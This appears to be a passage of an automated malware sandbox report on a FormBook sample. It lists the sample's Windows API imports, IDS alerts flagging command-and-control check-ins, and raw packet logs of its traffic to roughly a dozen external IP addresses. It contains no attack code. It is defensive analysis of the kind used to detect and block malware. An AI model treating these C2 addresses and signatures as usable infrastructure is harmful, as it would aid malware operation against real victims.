                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-16T22:02:37.816421+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549754194.245.148.18980TCP
                                                            2024-12-16T22:02:55.117384+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54979547.83.1.9080TCP
                                                            2024-12-16T22:02:57.773420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54980147.83.1.9080TCP
                                                            2024-12-16T22:03:00.429783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54980747.83.1.9080TCP
                                                            2024-12-16T22:03:03.830114+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54981347.83.1.9080TCP
                                                            2024-12-16T22:03:11.132630+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54983547.83.1.9080TCP
                                                            2024-12-16T22:03:13.851422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54984147.83.1.9080TCP
                                                            2024-12-16T22:03:16.523291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54984747.83.1.9080TCP
                                                            2024-12-16T22:03:19.923385+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54985747.83.1.9080TCP
                                                            2024-12-16T22:03:27.043223+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54987484.32.84.3280TCP
                                                            2024-12-16T22:03:29.809419+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54988484.32.84.3280TCP
                                                            2024-12-16T22:03:32.469420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54989184.32.84.3280TCP
                                                            2024-12-16T22:03:35.140692+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54989784.32.84.3280TCP
                                                            2024-12-16T22:03:42.523243+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54991318.143.155.6380TCP
                                                            2024-12-16T22:03:45.242141+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54992018.143.155.6380TCP
                                                            2024-12-16T22:03:47.976746+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54992918.143.155.6380TCP
                                                            2024-12-16T22:03:51.172971+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54993618.143.155.6380TCP
                                                            2024-12-16T22:03:51.295609+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.143.155.6380192.168.2.549936TCP
                                                            2024-12-16T22:03:58.257694+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549952104.21.64.20880TCP
                                                            2024-12-16T22:04:00.916360+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549961104.21.64.20880TCP
                                                            2024-12-16T22:04:03.597403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549968104.21.64.20880TCP
                                                            2024-12-16T22:04:06.364704+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549974104.21.64.20880TCP
                                                            2024-12-16T22:04:14.460748+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549994160.25.166.12380TCP
                                                            2024-12-16T22:04:17.132760+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549996160.25.166.12380TCP
                                                            2024-12-16T22:04:19.804854+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549997160.25.166.12380TCP
                                                            2024-12-16T22:04:22.543837+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549998160.25.166.12380TCP
                                                            2024-12-16T22:04:29.301076+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549999209.74.79.4180TCP
                                                            2024-12-16T22:04:31.967145+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550000209.74.79.4180TCP
                                                            2024-12-16T22:04:34.707152+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001209.74.79.4180TCP
                                                            2024-12-16T22:04:37.299399+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550002209.74.79.4180TCP
                                                            2024-12-16T22:04:53.251237+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003202.95.11.11080TCP
                                                            2024-12-16T22:04:55.914940+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004202.95.11.11080TCP
                                                            2024-12-16T22:04:58.587934+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005202.95.11.11080TCP
                                                            2024-12-16T22:05:01.504074+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550006202.95.11.11080TCP
                                                            2024-12-16T22:05:08.792876+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000752.223.13.4180TCP
                                                            2024-12-16T22:05:11.482422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000852.223.13.4180TCP
                                                            2024-12-16T22:05:14.123172+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000952.223.13.4180TCP
                                                            2024-12-16T22:05:16.786054+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001052.223.13.4180TCP
                                                            2024-12-16T22:05:23.519305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011199.59.243.22780TCP
                                                            2024-12-16T22:05:26.224260+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012199.59.243.22780TCP
                                                            2024-12-16T22:05:28.863200+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013199.59.243.22780TCP
                                                            2024-12-16T22:05:31.538892+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550014199.59.243.22780TCP
                                                            2024-12-16T22:05:38.960871+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550015156.226.63.1380TCP
                                                            2024-12-16T22:05:41.632700+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550016156.226.63.1380TCP
                                                            2024-12-16T22:05:44.304560+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017156.226.63.1380TCP
                                                            2024-12-16T22:05:47.024470+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550018156.226.63.1380TCP
                                                            2024-12-16T22:05:54.456999+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019162.218.30.23580TCP
                                                            2024-12-16T22:05:57.123684+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020162.218.30.23580TCP
                                                            2024-12-16T22:05:59.807796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021162.218.30.23580TCP
                                                            2024-12-16T22:06:02.459434+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550022162.218.30.23580TCP
                                                            2024-12-16T22:06:09.354945+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023109.206.161.1580TCP
                                                            2024-12-16T22:06:12.261079+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024109.206.161.1580TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 16, 2024 22:02:36.419743061 CET4975480192.168.2.5194.245.148.189
                                                            Dec 16, 2024 22:02:36.539735079 CET8049754194.245.148.189192.168.2.5
                                                            Dec 16, 2024 22:02:36.539927959 CET4975480192.168.2.5194.245.148.189
                                                            Dec 16, 2024 22:02:36.553023100 CET4975480192.168.2.5194.245.148.189
                                                            Dec 16, 2024 22:02:36.672852993 CET8049754194.245.148.189192.168.2.5
                                                            Dec 16, 2024 22:02:37.816081047 CET8049754194.245.148.189192.168.2.5
                                                            Dec 16, 2024 22:02:37.816122055 CET8049754194.245.148.189192.168.2.5
                                                            Dec 16, 2024 22:02:37.816207886 CET8049754194.245.148.189192.168.2.5
                                                            Dec 16, 2024 22:02:37.816421032 CET4975480192.168.2.5194.245.148.189
                                                            Dec 16, 2024 22:02:37.816529989 CET4975480192.168.2.5194.245.148.189
                                                            Dec 16, 2024 22:02:37.819782019 CET4975480192.168.2.5194.245.148.189
                                                            Dec 16, 2024 22:02:37.939672947 CET8049754194.245.148.189192.168.2.5
                                                            Dec 16, 2024 22:02:53.469100952 CET4979580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:53.589075089 CET804979547.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:53.589224100 CET4979580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:53.603586912 CET4979580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:53.723608971 CET804979547.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:55.117383957 CET4979580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:55.238039970 CET804979547.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:55.238132000 CET4979580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:56.135644913 CET4980180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:56.255700111 CET804980147.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:56.255877018 CET4980180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:56.270107031 CET4980180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:56.389848948 CET804980147.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:57.773420095 CET4980180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:57.894049883 CET804980147.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:57.894119024 CET4980180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:58.792207003 CET4980780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:58.912281036 CET804980747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:58.912895918 CET4980780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:58.924498081 CET4980780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:02:59.044374943 CET804980747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:02:59.044455051 CET804980747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:00.429783106 CET4980780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:00.550024986 CET804980747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:00.550086975 CET4980780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:01.448580027 CET4981380192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:01.568483114 CET804981347.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:01.568639994 CET4981380192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:01.578192949 CET4981380192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:01.697942019 CET804981347.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:03.829849958 CET804981347.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:03.829956055 CET804981347.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:03.830113888 CET4981380192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:03.852363110 CET4981380192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:03.972166061 CET804981347.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:09.423506975 CET4983580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:09.543406963 CET804983547.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:09.543587923 CET4983580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:09.626432896 CET4983580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:09.746239901 CET804983547.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:11.132630110 CET4983580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:11.253201962 CET804983547.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:11.253369093 CET4983580192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:12.165918112 CET4984180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:12.285865068 CET804984147.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:12.286021948 CET4984180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:12.349762917 CET4984180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:12.469676018 CET804984147.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:13.851422071 CET4984180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:13.971761942 CET804984147.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:13.971860886 CET4984180192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:14.870594978 CET4984780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:14.995932102 CET804984747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:14.996000051 CET4984780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:15.015777111 CET4984780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:15.140964985 CET804984747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:15.145421028 CET804984747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:16.523291111 CET4984780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:16.739793062 CET804984747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:16.739883900 CET4984780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:17.542622089 CET4985780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:17.662450075 CET804985747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:17.662730932 CET4985780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:17.680674076 CET4985780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:17.800424099 CET804985747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:19.923130989 CET804985747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:19.923297882 CET804985747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:19.923384905 CET4985780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:19.927120924 CET4985780192.168.2.547.83.1.90
                                                            Dec 16, 2024 22:03:20.048413038 CET804985747.83.1.90192.168.2.5
                                                            Dec 16, 2024 22:03:25.807277918 CET4987480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:25.930171013 CET804987484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:25.930294991 CET4987480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:25.949803114 CET4987480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:26.073456049 CET804987484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:27.043097019 CET804987484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:27.043222904 CET4987480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:27.463382006 CET4987480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:27.583302975 CET804987484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:28.480704069 CET4988480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:28.601562977 CET804988484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:28.604437113 CET4988480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:28.624213934 CET4988480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:28.744115114 CET804988484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:29.809366941 CET804988484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:29.809418917 CET4988480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:30.235413074 CET4988480192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:30.356127024 CET804988484.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:31.245423079 CET4989180192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:31.368617058 CET804989184.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:31.368719101 CET4989180192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:31.384668112 CET4989180192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:31.505137920 CET804989184.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:31.505158901 CET804989184.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:32.469340086 CET804989184.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:32.469419956 CET4989180192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:32.908864021 CET4989180192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:33.028606892 CET804989184.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:33.916814089 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:34.040275097 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:34.040429115 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:34.052823067 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:34.172915936 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140481949 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140569925 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140587091 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140691996 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:35.140798092 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140846014 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140858889 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:35.140861988 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140880108 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.140921116 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:35.141570091 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.141586065 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.141603947 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:35.141606092 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:35.141675949 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:35.146527052 CET4989780192.168.2.584.32.84.32
                                                            Dec 16, 2024 22:03:35.266238928 CET804989784.32.84.32192.168.2.5
                                                            Dec 16, 2024 22:03:40.856379032 CET4991380192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:40.977989912 CET804991318.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:40.978070021 CET4991380192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:41.013056993 CET4991380192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:41.132937908 CET804991318.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:42.523242950 CET4991380192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:42.645318985 CET804991318.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:42.645385027 CET4991380192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:43.577414036 CET4992080192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:43.697702885 CET804992018.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:43.698509932 CET4992080192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:43.725243092 CET4992080192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:43.848833084 CET804992018.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:45.242141008 CET4992080192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:45.362432003 CET804992018.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:45.362490892 CET4992080192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:46.292340994 CET4992980192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:46.413516998 CET804992918.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:46.420820951 CET4992980192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:46.468830109 CET4992980192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:46.591466904 CET804992918.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:46.593890905 CET804992918.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:47.976746082 CET4992980192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:48.096842051 CET804992918.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:48.100917101 CET4992980192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:48.996344090 CET4993680192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:49.117403030 CET804993618.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:49.117485046 CET4993680192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:49.131628036 CET4993680192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:49.252396107 CET804993618.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:51.172766924 CET804993618.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:51.172857046 CET804993618.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:51.172971010 CET4993680192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:51.175903082 CET4993680192.168.2.518.143.155.63
                                                            Dec 16, 2024 22:03:51.295608997 CET804993618.143.155.63192.168.2.5
                                                            Dec 16, 2024 22:03:56.596827030 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:56.716746092 CET8049952104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:03:56.716831923 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:56.742886066 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:56.862853050 CET8049952104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:03:58.257694006 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:58.375479937 CET8049952104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:03:58.375619888 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:58.376446009 CET8049952104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:03:58.376543045 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:58.378071070 CET8049952104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:03:58.378998041 CET4995280192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:59.276431084 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:59.396193981 CET8049961104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:03:59.396325111 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:59.410849094 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:03:59.530870914 CET8049961104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:00.916359901 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:01.010770082 CET8049961104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:01.011107922 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:01.012634993 CET8049961104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:01.013106108 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:01.036226034 CET8049961104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:01.036283970 CET4996180192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:01.934844971 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:02.055273056 CET8049968104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:02.059204102 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:02.074033022 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:02.194013119 CET8049968104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:02.194071054 CET8049968104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:03.597403049 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:03.695151091 CET8049968104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:03.696903944 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:03.698153973 CET8049968104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:03.699609041 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:03.717607021 CET8049968104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:03.720266104 CET4996880192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:04.604784966 CET4997480192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:04.725079060 CET8049974104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:04.725187063 CET4997480192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:04.736855030 CET4997480192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:04.859174967 CET8049974104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:06.364476919 CET8049974104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:06.364496946 CET8049974104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:06.364703894 CET4997480192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:06.365170002 CET8049974104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:06.365380049 CET4997480192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:06.371366024 CET4997480192.168.2.5104.21.64.208
                                                            Dec 16, 2024 22:04:06.491101027 CET8049974104.21.64.208192.168.2.5
                                                            Dec 16, 2024 22:04:12.812798977 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:12.932786942 CET8049994160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:12.932874918 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:12.951555014 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:13.071403980 CET8049994160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:14.460747957 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:14.517842054 CET8049994160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:14.517911911 CET8049994160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:14.517935038 CET8049994160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:14.517997026 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:14.518048048 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:14.518048048 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:14.580502987 CET8049994160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:14.583869934 CET4999480192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:15.479670048 CET4999680192.168.2.5160.25.166.123
                                                            Dec 16, 2024 22:04:15.600167990 CET8049996160.25.166.123192.168.2.5
                                                            Dec 16, 2024 22:04:15.600368977 CET4999680192.168.2.5160.25.166.123
